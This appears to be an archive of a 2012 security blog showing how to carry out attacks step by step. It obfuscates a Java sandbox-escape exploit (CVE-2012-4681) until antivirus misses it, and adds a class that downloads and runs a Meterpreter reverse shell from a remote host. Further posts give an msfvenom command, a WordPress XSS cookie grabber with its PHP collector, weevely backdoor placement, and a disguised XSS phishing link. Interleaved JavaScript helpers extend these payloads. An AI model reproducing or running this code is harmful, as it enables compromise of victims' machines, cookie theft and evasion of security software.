Friday, December 7, 2012

Attacking Windows 8 with Java Exploit and Metasploit

In the last post I showed how to obfuscate a Java exploit (CVE-2012-4681, link here); now I want to show how an attacker can use that obfuscated exploit in a targeted attack.

This is intended as the second part of the Wordpress Cookie Grabber video, because I will show what you can do once you have compromised a website (Frank's blog in this case). The only victim will be the administrator.

The exploit code in the previous article just escapes the Java sandbox and launches the Windows calculator. What we want to do is launch something different, like a Meterpreter reverse shell that connects back to the attacker. So we have to add a download & execute class/method to the previous code.

I opted for a new class, but you can certainly add a method to the same class. This new class, called NewClass (I'm not very imaginative with names), downloads a Meterpreter executable from a remote host, saves it into the temp folder as fsc73B8.tmp.exe and then executes it.

import java.io.FileOutputStream;
import java.net.URL;
import java.nio.channels.Channels;
import java.nio.channels.ReadableByteChannel;

class NewClass
{
    // Pieces of the "java.io.tmpdir" property name, split so the literal never appears
    String t = "java", m = "io", p = "tmpdir", dot = ".";
    // Pieces of the remote URL http://192.168.2.3/folder/java.exe
    String r1 = "http:", e = "//192", m1 = "168", o = "2.3/fo", t1 = "lder/java", e1 = "exe";
    
    public NewClass()
    {
        String l = System.getProperty( t+dot+m+dot+p ); // get temp folder path
        String r = r1+e+dot+m1+dot+o+t1+dot+e1;          // rebuild the download URL
        d( r, l );
    }
    
    // Download rPath into lPath\fsc73B8.tmp.exe and run it
    private void d(String rPath, String lPath)
    {
        // File name
        lPath += "\\fsc73B8.tmp.";
        try
        {
            URL url = new URL(rPath);
            ReadableByteChannel rbc = Channels.newChannel(url.openStream());
            FileOutputStream fos = new FileOutputStream(lPath+"exe");
            fos.getChannel().transferFrom(rbc, 0, 1 << 24); // copy up to 16 MiB
            fos.close();

            // execute
            Runtime.getRuntime().exec(lPath+"exe");
            
        } catch( Exception e ){} // swallow errors so the applet fails silently
    }
}

These two classes will be packed into one jar named java.jar; will it be detected by antivirus?


Link here.

OK, great, it's not detected. In our scenario we have to infect only the administrator (Frank), and only if he has a vulnerable version of Java. To check this we use PluginDetect, a powerful JavaScript library (also used by Blackhole up to version 1.2.5) that can detect the plugins installed in the browser.

The page that performs this check will look like this.

<script src="PluginDetect.js" type="text/javascript"></script>
<script type="text/javascript">

        // detect java plugin
        if( PluginDetect.isMinVersion("Java") >= 0 )
        {
                // check version: calling getVersion with a one-character argument sets the
                // version delimiter, so the next call returns e.g. "1 7 0 6" instead of "1,7,0,6"
                PluginDetect.getVersion(" ");
                var version = PluginDetect.getVersion("Java");

                // Affected versions (Java 7 update 0 to update 6)
                // 170, 1701, 1702, 1703, 1704, 1705, 1706
                version = version.replace(/\s/g, "");

                // three digits means no update number (e.g. "170" for 1.7.0), so pad it;
                // "160" becomes "1600" instead of being mistaken for 1.7.0
                if( version.length == 3 )
                        version += "0";

                // Convert to int so i can compare
                var intVersion = parseInt(version, 10);

                // if vulnerable
                if( intVersion >= 1700 && intVersion <= 1706 )
                {
                   document.write("<applet code=\"Java.class\" archive=\"java.jar\"></applet>");
                }

        }
</script>
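As an added example (not code from the original post), here is a version check written to be less fragile than the digit-concatenation trick in the landing page above: it parses the comma-, space- or dot/underscore-delimited forms and compares the components numerically, so "1,6,0" is not confused with 1.7.0 and "1,7,0,10" is not compared as a string. The affected range, Java 7 Update 0 through Update 6, is the one the post targets; the applet tag is the post's own. The version strings in the comments are constructed inputs.

```javascript
// Added example, not part of the original post.
// Normalise a version string into four integers, e.g.
// "1,7,0,6" -> [1,7,0,6]; "1.7.0_06" -> [1,7,0,6]; "1 7 0" -> [1,7,0,0].
// Returns null for anything it cannot parse (no plugin, garbage, empty).
function parseJavaVersion(raw) {
  if (typeof raw !== "string") return null;
  var parts = raw.trim().split(/[\s,._]+/).filter(function (p) { return p.length > 0; });
  if (parts.length < 2) return null;
  var nums = parts.map(function (p) { return parseInt(p, 10); });
  if (nums.some(isNaN)) return null;
  while (nums.length < 4) nums.push(0);   // missing update number means update 0
  return nums.slice(0, 4);
}

// Component-wise comparison; returns -1, 0 or 1.
function compareVersions(a, b) {
  for (var i = 0; i < 4; i++) {
    if (a[i] < b[i]) return -1;
    if (a[i] > b[i]) return 1;
  }
  return 0;
}

// CVE-2012-4681 affects Java 7 Update 0 through Update 6 (fixed in 7u7).
var FIRST_AFFECTED = [1, 7, 0, 0];
var LAST_AFFECTED  = [1, 7, 0, 6];

function isVulnerableJava(raw) {
  var v = parseJavaVersion(raw);
  if (v === null) return false;          // unknown version: do not serve the applet
  return compareVersions(v, FIRST_AFFECTED) >= 0 &&
         compareVersions(v, LAST_AFFECTED) <= 0;
}

// Drop-in replacement for the inline check in the landing page: the applet
// tag to document.write(), or null when the browser should get nothing.
function appletTagFor(raw) {
  if (!isVulnerableJava(raw)) return null;
  return '<applet code="Java.class" archive="java.jar"></applet>';
}

// Constructed inputs: where the original check goes wrong is "1,6,0", which
// collapses to "160", is padded to "1700" and would be served the applet.
var SAMPLES = ["1,7,0,6", "1,7,0", "1,7,0,7", "1,6,0", "1,6,0,31", "1.7.0_06"];
SAMPLES.forEach(function (s) { console.log(s, "->", isVulnerableJava(s)); });
```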


Now it's time to create a Meterpreter reverse TCP shell that connects back to us.

sudo msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=192.168.2.10 LPORT=15000 > meterpreter.exe

As you can imagine, this executable will be detected by most antivirus products, even if we use encoders. The best solution would be to write your own crypter, since any crypter you find online is not FUD precisely because it is public. I don't have time to write my own (and I don't know how yet), but one day I will. On this page there are a few crypters claiming to be fully undetectable; I chose 0vcrypter because it can bypass Microsoft's detection.


Frank lives in the United States and, according to this chart provided by opswat.com, Microsoft Security Essentials is the most widespread antivirus there. With it installed by default on Windows 8 (as Windows Defender), this percentage will increase even more in the coming months.


After encrypting our Meterpreter shell and renaming it java.exe, we have all the files we need:
  • page.html (landing page)
  • PluginDetect.js
  • java.jar (exploit)
  • java.exe (meterpreter shell)
Now we can upload all these files to a remote host.

If you remember, in the previous video we left a weevely shell on his site, so now we can connect to it and modify admin-header.php, located in the wp-admin folder, so that it loads the landing page.


Now start a Meterpreter listener and, if we are lucky and Frank has a vulnerable version of Java, our shell will be dropped correctly.


Once we have a Meterpreter session we can do a lot of things, but for now we just take a screenshot of the desktop.


Enjoy the video.




Thursday, November 15, 2012

Java Exploit Code Obfuscation and Antivirus Bypass/Evasion (CVE-2012-4681)

Why not play a game where we try to make the latest (at the time of writing) public Java exploit (CVE-2012-4681) undetected by all antivirus products and see which one will be the last to detect it? I think it will be a fun "challenge", because evading antivirus has always had its charm.

I will not use software obfuscators like ProGuard, Allatori, Zelix KlassMaster etc., because that would not be fun. This is not intended to be an analysis or explanation of the exploit, because there are already great posts here:

Before we start we need to make two considerations:
  • From The Current Web-Delivered Java 0Day: "So while you may see a few links to Virustotal with the inevitable complaining that a scanner is missing a specific chunk of altered code along with inaccurate claims that "AV is dead!" or "AV can't detect it", you should take them for the grain of salt that they are. The real story about client side mass exploitation is more complex than those claims."
  • The order in which antivirus products are bypassed depends mainly on how I modify the exploit/flow.

Last Antivirus Standing

Who will be the last? Make your guess.

Let's start by simply copying the code from jduck's PoC taken from here: http://pastie.org/4594319. Uploading the compiled applet (.class file) to VirusTotal we start with a detection rate of 23/43; the first notable misses are from Kaspersky, McAfee and Panda.


Virustotal link here.
Full image here.

One important thing is strings: as you can see there are a few of them, for example sun.awt.SunToolkit, file://, forName etc. One step to bring down detection is to obfuscate these strings; for example, sun.awt.SunToolkit will become a char array. There are many other ways to obfuscate a string, for example using StringBuilder, hex to ASCII, decimal to ASCII, String.replace and so on.

// setSecurityManager: the digits are padding, stripped at runtime with replaceAll("\\d","")
String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
// sun.awt.SunToolkit as a char array, rebuilt with new String(sun)
char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
// file:/// as decimal char codes
char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
// forName, concatenated at runtime as aw+ad+kl+me
String   ad = "or",me = "me", aw = "f", kl = "Na";
// getField, same digit padding as secMan
String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567"; 
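Added example, not from the original post: a small generator, written in JavaScript so it runs anywhere, for the two string-hiding forms used above. It emits Java source fragments for the digit-padded and char-array encodings and decodes them again, so you can check that the runtime value is unchanged; the obfuscation only changes what a byte-pattern signature sees in the .class constant pool, not what the JVM ends up calling. The LCG seed and the helper names are my own choices.

```javascript
// Added example, not part of the original post.
// Deterministic PRNG (LCG) so the emitted padding is reproducible; seed is arbitrary.
function makeRng(seed) {
  var s = seed >>> 0;
  return function () {
    s = (Math.imul(s, 1664525) + 1013904223) >>> 0;
    return s / 4294967296;
  };
}

// Trick 1: interleave 0-3 random digits before each character of `s`.
// The Java side decodes with s.replaceAll("\\d", ""), so the plaintext must
// not itself contain digits; the generator refuses rather than corrupt it.
function digitPad(s, seed) {
  if (/\d/.test(s)) throw new Error("plaintext contains digits; replaceAll would corrupt it");
  var rnd = makeRng(seed === undefined ? 1 : seed);
  var out = "";
  for (var i = 0; i < s.length; i++) {
    var n = Math.floor(rnd() * 4);          // how many padding digits here
    for (var j = 0; j < n; j++) out += Math.floor(rnd() * 10);
    out += s.charAt(i);
  }
  return out;
}

// Same operation as Java's replaceAll("\\d", "").
function digitUnpad(s) { return s.replace(/\d/g, ""); }

// Trick 2: emit `s` as a Java char[] literal of numeric casts,
// e.g. {(char)102,(char)105,...}; fromJavaCharArray reverses it.
function toJavaCharArray(s) {
  var items = [];
  for (var i = 0; i < s.length; i++) items.push("(char)" + s.charCodeAt(i));
  return "{" + items.join(",") + "}";
}
function fromJavaCharArray(literal) {
  var codes = literal.match(/\d+/g) || [];
  return codes.map(function (c) { return String.fromCharCode(parseInt(c, 10)); }).join("");
}

// A complete Java field declaration in either form, ready to paste.
function javaDeclaration(name, s, mode, seed) {
  if (mode === "digits") return "String " + name + " = \"" + digitPad(s, seed) + "\";";
  if (mode === "chars")  return "char " + name + "[] = " + toJavaCharArray(s) + ";";
  throw new Error("unknown mode " + mode);
}

// Usage: regenerate the declarations used in the post.
console.log(javaDeclaration("secMan", "setSecurityManager", "digits", 7));
console.log(javaDeclaration("sun", "sun.awt.SunToolkit", "chars"));
console.log(javaDeclaration("file", "file:///", "chars"));
```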

Once done, compile and re-upload it.


Virustotal link here.
Full image here.
Code here.

As you can see, just obfuscating a bunch of strings can decrease antivirus detection. Twelve antivirus products are out of the game; the most notable defeats are from Microsoft, Symantec, TrendMicro and DrWeb.

Now we can clean up the code a bit, because we don't need functions like paint. In addition we change the applet name from Gondvv to Java, merge the code from setField into disableSecurity and rename it, since having a function named disableSecurity is not a good thing. Now the code will look like this.

import java.applet.Applet;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

public class Java extends Applet
{
    // setSecurityManager (digits are padding, stripped with replaceAll("\\d",""))
    String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
    //sun.awt.SunToolkit
    char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
    // file:///
    char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
    // forName
    String   ad = "or",me = "me", aw = "f", kl = "Na";
    // getField
    String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567"; 

    // Despite the name, this disables the security manager: fetch the private
    // "acc" field of Statement through SunToolkit.getField, replace it with an
    // AllPermission context, then run System.setSecurityManager(null) via the Statement.
    public void enableSecurity() throws Throwable
    {
        Statement localStatement = new Statement(System.class, secMan.replaceAll("\\d",""), new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL(new String(file)), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = Statement.class;
        arrayOfObject[1] = "a"+"c"+"c";
        Expression localExpression = new Expression(GetClass(new String(sun)), field.replaceAll("\\d",""), arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(localStatement, localAccessControlContext);
        
        localStatement.execute();
    }

    public void init()
    {
        try
        {
            enableSecurity();
            Runtime.getRuntime().exec("calc");
        }
        catch(Throwable t){}
    }
    
    // Class.forName(paramString) called through a java.beans.Expression
    private Class GetClass(String paramString) throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, aw+ad+kl+me, arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }    
}

Once again compile and re-upload.



Virustotal link here.
Full image here.

The ratio is 9/44; Avast and MicroWorld-eScan fall to a simple function/class renaming. Now we modify the flow a bit and rename all the variables, for example localPermissions becomes pe. Once again re-upload to VirusTotal.

Damn, the detection ratio is still 9/44 (same picture as above). How can we drop detection? Simple: do the same thing but in another way. When I try to make an exploit undetected by antivirus I start testing line by line, following the flow of the exploit, to see which line triggers some antivirus. In this case from line 32 we start triggering F-Secure.




Another tip is to remove some variables and see if the detection ratio changes; in this case, if we remove Statement.class and substitute it with null, detection goes from 9/44 to 7/44.




Virustotal link here.

So, can I retrieve the Statement class in another way? For sure, and the method is right under our nose: instead of other approaches like a literal Class.forName("Statement"), we can use GimmeClass (the renamed GetClass helper, which already resolves classes through a java.beans.Expression).


Re-upload the .class file to VirusTotal and let's see if that works.


Virustotal link here.
Full image here.

Code here.

import java.applet.Applet;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

public class Java extends Applet
{
    // setSecurityManager
    String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
    //sun.awt.SunToolkit
    char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
    // file:///
    char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
    // forName
    String   ad = "or",me = "me", aw = "f", kl = "Na";
    // getField
    String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567";

    public void enableSecurity() throws Throwable
    {
        Object ao[] = new Object[2];
        ao[0] = GimmeClass("java.beans.Statement"); //Statement.class;
        ao[1] = "a"+"c"+"c";

        Expression e = new Expression(GimmeClass(new String(sun)), field.replaceAll("\\d",""), ao);
        e.execute();
        Field field = (Field)e.getValue(); // local shadows the String field of the same name

        Permissions pe = new Permissions();
        pe.add(new AllPermission());

        CodeSource cs = new CodeSource(new URL(new String(file)), new Certificate[0]);
        ProtectionDomain pd = new ProtectionDomain(cs, pe);

        AccessControlContext ac = new AccessControlContext(new ProtectionDomain[] { pd });

        Statement stat = new Statement( System.class, secMan.replaceAll("\\d",""), new Object[1]);
        field.set(stat, ac);
        stat.execute();
    }

    public void init()
    {
        try
        {
            enableSecurity();
            Runtime.getRuntime().exec("calc");
        }
        catch(Throwable t){}
    }

    // Class.forName(ps) called through a java.beans.Expression
    private Class GimmeClass(String ps) throws Throwable
    {
        Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps});
        le.execute();
        return (Class)le.getValue();
    }    
}
Now the detection ratio is 7/44, and AVG and ESET are gone.

Again we remove parts of the code to see where detection changes. If we delete the last three lines of code, detection drops to 0/44. But these lines instantiate a class and call a method; how can we do this in another way? Simple, we use reflection.

From Stackoverflow:
The name reflection is used to describe code which is able to inspect other code in the same system (or itself).
For example, say you have an object of an unknown type in Java, and you would like to call a 'doSomething' method on it if one exists. Java's static typing system isn't really designed to support this unless the object conforms to a known interface, but using reflection, your code can look at the object and find out if it has a method called 'doSomething', and then, call it if you want to.
Using the Java documentation from here and there, we instantiate a class and call two methods via reflection.

Before:
Statement stat = new Statement( System.class,secMan.replaceAll("\\d",""), new Object[1]);
field.set(stat, ac);
stat.execute();

After (Constructor and Method come from java.lang.reflect):
Class statClass = GimmeClass("java.beans.Statement");
Constructor con = statClass.getConstructor(new Class[]{ Object.class, String.class, Object[].class});
Object stat = con.newInstance(GimmeClass("java.lang.System"),secMan.replaceAll("\\d",""), new Object[1]);
field.set(stat, ac);
Method m = stat.getClass().getMethod("execute");
m.invoke(stat);

First we check that the exploit still works, to see if we messed something up; it does. OK, now upload to VirusTotal and it should be a nice 0/44 detection...



Virustotal link here.
Full image here.
Code here.

Damn, we were so close. One antivirus product still detects our exploit. Guess who is back?


Since it is the last to detect our exploit, Microsoft Security Essentials is the winner of this small competition. This post can't end here, because we want to make our exploit fully undetectable. Take a look at the two lines below.

Permissions pe = new Permissions();
pe.add(new AllPermission());

Why not use reflection here too? They become:

Class alPerm = Class.forName("java.security.AllPermission");
Class perm   = GimmeClass("java.security.Permissions");
Object pe= perm.newInstance();
Method method = pe.getClass().getMethod("add", GimmeClass("java.security.Permission"));
method.invoke(pe, alPerm.newInstance());

Once uploaded to VirusTotal the detection ratio is ...



Virustotal Link here.
Full image here.
Code here.

Great! If we create a jar file, will it be detected?


Virustotal link here.

Like the class file, it is not detected.

Now we can test it on a Windows machine with Security Essentials installed to see if it really works. For this test I used Windows 8, which has Windows Defender (Security Essentials) installed by default.


It works! I know this can't prove anything (it's just a picture), but soon I will post a video about it. You can find the video here.

Hope you enjoyed.

Step by step java exploit code: 1/5, 2/5, 3/5, 4/5, 5/5.

References:
- Creating new class instances
- Invoking methods
- What are all the different ways to create an object in Java?
- How do I invoke a java method when given the method name as a string?

Friday, November 2, 2012

Wordpress Cookie Grabber

In a previous video, Wordpress XSS + Internet Explorer 8 Exploit, I showed how you can use a cross-site scripting vulnerability to redirect a victim using Internet Explorer to a malicious site containing an exploit for version 8. Another way is to use it as a cookie grabber.

From wikipedia:
A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is usually a small piece of data sent from a website and stored in a user's web browser while a user is browsing a website. When the user browses the same website in the future, the data stored in the cookie can be retrieved by the website to notify the website of the user's previous activity.
Basically, when a user visits the "infected" page, all cookies for that domain are sent to a script which stores the information in a file/db or sends it via email to the attacker.

After selecting our WordPress target (franksite.dot/wordpress) we use a vulnerability scanner called wpscan, developed by ethicalhack3r, which is able to gather useful information such as:
  • WordPress version
  • WordPress vulnerabilities (link to exploit-db)
  • all installed plugins
  • plugin vulnerabilities (link to exploit-db)


As we can see, there is a plugin installed called Count per Day which seems to be vulnerable. The results on exploit-db lead to two vulnerabilities for two different versions, therefore first we have to check which version is installed. As many plugins do, this one ships a file in its folder with the current version, changelog etc., and since its folder is publicly accessible, you can see all the files.


After opening readme.txt and seeing that the current version is 3.2.3, we can focus on the earlier exploit found on exploit-db. This version is vulnerable to a stored XSS.

How does this vulnerability work? As you can see from the picture below, there is a file notes.php which allows everyone to add notes.


A note can be plain text or HTML.


This content is displayed in the Count per Day dashboard and the developer didn't validate the input, but the main problem with this page is that it shouldn't be accessible to everyone.


This is a perfect scenario for a cookie grabber, because the code is executed only in the administrator panel.

How can we get the admin cookie?

We need two things:
  1. JavaScript code that reads the cookie through document.cookie and sends it
  2. A script (PHP, Python, Ruby ...) on another server that receives the information and stores it (file, MySQL, email...).
A lot of online examples use a redirect to get the cookie, like this one:
document.location = "http://scriptlocation.dot/script?c=" + document.cookie 
In this case that is not acceptable, because we want to do it in the stealthiest way possible. What we need is a GET request to a script, so how can we do it in JavaScript without a redirect?
A clever way is to use the Image object and its src property. Once done, the code will look like this:

If we add this code as a note, nothing will happen, because Count per Day escapes quotes.


Since only quotes are escaped, we can bypass this filter in two ways:
  1. Convert the URL into character codes
  2. Use non-alphanumeric JavaScript
Let's try both. For the first we need an ASCII to character-code converter; I found this site: string-fromcharcode-encoder. After conversion our code will look like this:

new Image().src = String.fromCharCode(104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,50,46,51,47,102,111,108,100,101,114,47,103,114,97,98,98,101,114,46,112,104,112,63,99,61) + document.cookie;

Now the code will be executed, because there are no quotes. A downside is that if the administrator checks the page source he will see the string document.cookie and may suspect something.

In the second way we transform the JavaScript code into an equivalent sequence of () [] {} ! + characters. A guy named Patricio Palladino made it possible by creating a tool available here. Now our cookie grabber will look like this:
[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]](([]
-- snip --
This way we obfuscate all of the code, but the length is a disadvantage for stealthier code. One last thing: we need to use the JavaScript escape function, otherwise some cookie characters will be altered, for example instead of % we get |.
new Image().src="http://192.168.2.3/folder/grabber.php?c=" + escape(document.cookie);
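Added example (not from the original post): building the quote-free String.fromCharCode payload above from a URL, instead of pasting it into an online encoder, plus an offline decode to confirm it. Only the URL is hidden this way; the document.cookie reference stays readable, which is the drawback mentioned above. The grabber URL is the post's own example host, not a real endpoint, and the function names are mine.

```javascript
// Added example, not part of the original post.
// Turn any string into a String.fromCharCode(...) expression that contains no
// quote characters (quotes are the only thing Count per Day escapes).
function toFromCharCode(s) {
  var codes = [];
  for (var i = 0; i < s.length; i++) codes.push(s.charCodeAt(i));
  return "String.fromCharCode(" + codes.join(",") + ")";
}

// Full payload: a GET through Image.src (no redirect, nothing visible in the
// DOM), with the cookie escaped so ';', '%' and '=' survive the query string.
function buildGrabberPayload(grabberUrl) {
  var expr = toFromCharCode(grabberUrl + "?c=");
  return "new Image().src=" + expr + "+escape(document.cookie);";
}

// Pre-flight check a tester runs before planting the note: the filter
// escapes " and ', so the payload must not contain either.
function containsQuotes(payload) {
  return /["']/.test(payload);
}

// Evaluate the encoded part offline to confirm it decodes to the URL.
// Function() is used instead of eval so the expression sees no local scope.
function decodeFromCharCodeExpr(expr) {
  return Function("return " + expr)();
}

// Usage
var payload = buildGrabberPayload("http://192.168.2.3/folder/grabber.php");
console.log(payload);
console.log("quote-free:", !containsQuotes(payload));
```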

So far we have explained how to get the cookie; now let's talk about how to store the information. This task is very simple, because with a few lines of PHP we can store all incoming cookies in a text file.

Script code:

<?php
$file_name   = "cookie.txt";   // stolen cookies are appended here
$suicide_key = "password";     // ?s=<key> deletes the log and this script

if( isset($_GET['c']) )
{
        // one cookie per line, between START/END markers
        $content = $_GET['c'];
        $content = str_replace(" ", "", $content);
        $lines = explode(";", $content);

        $handle = fopen($file_name, 'a');

        fwrite($handle, "----- START\n\n");

        foreach( $lines as $line )
                fwrite($handle, $line."\n");

        fwrite($handle, "\n----- END\n");
        fclose($handle);
} 
else if( isset($_GET['s']) )
{
        // suicide mode: remove the log and the script itself
        if( strcmp( trim($_GET['s']), $suicide_key ) == 0 )
        {
                unlink($file_name);
                unlink(__FILE__);
        }
} 
This code is simple and doesn't need explanation; the only addition is a suicide mode in case the attacker wants to delete both files. Once we have the administrator cookie we use Cookies Manager+, a Firefox plugin that can add/remove cookies.



After adding our cookie, reload the page and voilà: administrator privileges acquired. Since the cookie can change, or Count per Day can be removed or updated, we need a way to create a backdoor (stay persistent). This is where weevely comes in handy:
Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application post exploitation, and can be used as a stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.
Luckily franksite.dot has a plugin installed to manage files, so as administrators we can upload weevely and connect to it.


To be stealthier we upload weevely again, but this time into another folder (wp-admin) and with a name that looks like a legitimate WordPress file.


That's all for now. Enjoy the video.



References:
- Sample penetration test report
- String.fromCharCode encoder: https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/
- JavaScript non-alphanumeric obfuscator

Tuesday, October 2, 2012

Google winning award email scam

Just a quick post, because I've never seen this type of scam (using Google as the lure), although I think it's an old technique.


I have won a cash prize from Google, but why did Gmail move the email to the spam folder? :(

Attached pdf.


The graphics seem to have been made with Paint, because they are horrible. If they want to convince people to send their credentials, they should at least make a better template.

Wednesday, May 30, 2012

From XSS to NT AUTHORITY

Many times I have seen cross-site scripting vulnerabilities classified as low impact or not significant. So this time I want to show how an attacker can obtain administrative privileges through a simple XSS.

A couple of months ago I discovered an XSS vulnerability affecting the UK website of Orange, http://www.orange.co.uk. I emailed them a month ago (and again two weeks ago) about this vulnerability, but I haven't received any response yet.

From wikipedia:
Orange is the flagship brand of the France Telecom group for mobile, landline and Internet businesses, with 226 million customers as of December 2011 and, under the brand Orange Business Services, is one of the world.
How did I find this XSS?

When you read an article, for example this one, obesity_levels_could_be_cut_with_20_fat_tax, you can see the user comments at the bottom of the page. If a user wants to leave a comment, he must log in via Google, Facebook etc. Once logged in, the website creates a profile with all your statistics (recent comments) and personal information (age, gender, joined).


If you click on the name of a user you will be redirected to his profile page, like the one below.


If you take a look at the url you will see that it has three parameters:
  1. UID
  2. plckUserId
  3. plckPersonaPage
Let's start by testing the first parameter. We type some special characters that are used to find potential XSS vulnerabilities, like )("><'/&\.

hxxp://web.orange.co.uk/r/community/persona?UID=)("><'/&\

Surprisingly, we get this


Oh... we are lucky; at the first attempt we obtained something interesting. Let's try with a bit of HTML code.


As expected, the page didn't sanitize the output and interpreted the HTML code. Using Firebug we can see in which part of the page the faulty parameter is located.


Now we substitute the h1 tag with a script tag (<script>alert(0)</script>) and we should get an alert box.


Not so; let's take a look at the source code.



It seems there is an XSS filter with a blacklist of tags. There are tons of other ways to trigger an XSS without a script tag; one of them is using the img tag.

<img/src="1"/onerror="alert(1)"


Since 1 isn't a valid image, the onerror event is triggered and its content executed. Now all we have to do is substitute the alert instruction with some useful code.

In our case we want to redirect the victim to a cloned page containing a malicious Java applet, so the code will be:



How can we trick the victim into clicking our malicious link?

Simple: we can send him an email about some promotion that Orange actually runs, telling him to click on the image.



But here we have a little problem.

When you hover the mouse over the image, in most browsers the link the image points to appears at the bottom. Some users may become suspicious seeing a link like hxxp://web.orange.co.uk/r/community/persona?UID="><img/src="1"/onerror="window.location='...'", so disguising the URL is a necessary step.

To accomplish this we do two things:

  1. Add non-existent URL parameters ( page=1&category=2&ticket=24234&session_id=888 )
  2. Percent-encode the XSS characters ( UID="><img ... becomes %55%49%44=%22%3E%3C%69%6D%67.... )

And the result is this.
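The two disguising steps above, as an added example (not from the original post): percent-encode every byte of the vulnerable parameter and its payload, so no '<', '>' or quote is readable in the hover preview, then append the decoy parameters. Browsers and the server decode %xx transparently, so the XSS still fires. The payload is the post's img/onerror vector with a placeholder redirect target (attacker.example, an assumption); decodeQuery shows what the server sees after decoding.

```javascript
// Added example, not part of the original post.
// Percent-encode EVERY character (encodeURIComponent leaves letters, digits
// and a few symbols readable, which is not what we want here).
function percentEncodeAll(s) {
  var bytes = unescape(encodeURIComponent(s)); // UTF-8 bytes, one per char
  var out = "";
  for (var i = 0; i < bytes.length; i++) {
    var h = bytes.charCodeAt(i).toString(16).toUpperCase();
    out += "%" + (h.length < 2 ? "0" + h : h);
  }
  return out;
}

// Build the disguised link: fully encoded vulnerable parameter first, then
// plausible-looking decoy parameters so the URL reads like a tracked link.
function disguiseXssUrl(base, param, payload, decoys) {
  var qs = percentEncodeAll(param) + "=" + percentEncodeAll(payload);
  for (var k in decoys) {
    if (Object.prototype.hasOwnProperty.call(decoys, k)) {
      qs += "&" + encodeURIComponent(k) + "=" + encodeURIComponent(String(decoys[k]));
    }
  }
  return base + "?" + qs;
}

// What the server (and the vulnerable page) sees after decoding the query.
function decodeQuery(url) {
  var q = url.split("?")[1] || "";
  var out = {};
  q.split("&").forEach(function (pair) {
    var kv = pair.split("=");
    out[decodeURIComponent(kv[0])] = decodeURIComponent(kv.slice(1).join("="));
  });
  return out;
}

// Usage: the post's vector with a placeholder target (attacker.example is an assumption)
var PAYLOAD = '"><img/src="1"/onerror="window.location=\'http://attacker.example/\'"';
var DECOYS = { page: 1, category: 2, ticket: 24234, session_id: 888 };
var link = disguiseXssUrl("hxxp://web.orange.co.uk/r/community/persona", "UID", PAYLOAD, DECOYS);
console.log(link);
console.log(decodeQuery(link).UID === PAYLOAD ? "round-trips" : "mismatch");
```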


To compromise the victim's machine we use a great feature of SET called the Java Applet Attack Vector.

From http://www.social-engineer.org:
The Java Applet is one of the core attack vectors within SET and the highest success rate for compromise. The Java Applet attack will create a malicious Java Applet that once run will completely compromise the victim. The neat trick with SET is that you can completely clone a website and once the victim has clicked run, it will redirect the victim back to the original site making the attack much more believable.
I cloned this page, hxxp://web.orange.co.uk/p/film/cinema_tickets, and sent the email from an address like the ones many companies use when they send promotions and the like (donotreply@...).

That's all, enjoy the video.

Monday, April 23, 2012

CartaSi phishing email part 2/2

Are there several people behind these phishing emails, or just one guy?

What I think is that there is only one guy, because if you check the title of this script you see "assembled by ME"; if it were a team it would read "Assembled by XYZ team".


Where is he from?

His mother tongue is Romanian and I think he lives in Italy. As you can see below there are several files written in Romanian, and the stolen information is sent to a Fastweb email address, which you cannot create if you don't live in Italy.

I was wrong in the previous article when I said that the phisher hacked the website: it was actually defaced by FERID23 from anti-armenia.org. I suppose that at the end of September 2011 this phisher found it, uploaded a shell and created several folders in this order:
  1. d3b (Postepay information stealer)
  2. stf (CartaSi, UK PayPal, Banca Intesa, IT PayPal, Postepay, VISA)
  3. pastote (CartaSi, PayPal, VISA, BancoPostaClick)

